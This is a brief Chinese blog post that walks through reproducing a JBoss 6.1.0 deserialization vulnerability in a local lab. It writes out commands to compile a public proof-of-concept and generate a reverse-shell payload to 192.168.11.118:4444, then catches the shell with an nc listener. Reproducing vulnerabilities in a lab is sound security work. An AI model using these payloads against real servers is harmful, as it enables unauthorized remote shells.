CVE-2017-12419漏洞复现

2018-02-03  本文已影响0人  __周__

我是从官网下载的直接解压就可以用,各个版本的JBOSS文件位置可能不一样


server.xml路径:

jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml

首先需要把service.xml的内容改为图下的内容

图片.png

然后找到

jboss-6.1.0.Final\bin\run.bat
运行,之后如果看到了


图片.png

那么说明启动成功,本地访问一下,看是否可以访问到


图片.png

可以访问;
接下来去kali中,去github下载poc
https://github.com/joaomatosf/JavaDeserH2HC

图片.png

然后在kali中执行生成二进制的payload文件。

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 

修改接受shell的主机IP和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.11.118:4444

重开一个窗口,开启nc监听本地4444端口

图片.png

然后发送payload到服务器


图片中IP可能不对应,我的图没了,又比较懒就懒得搞了.jpg

查看nc 有shell 连接进来

图片中IP可能不对应,我的图没了,又比较懒就懒得搞了.png
上一篇下一篇

猜你喜欢

热点阅读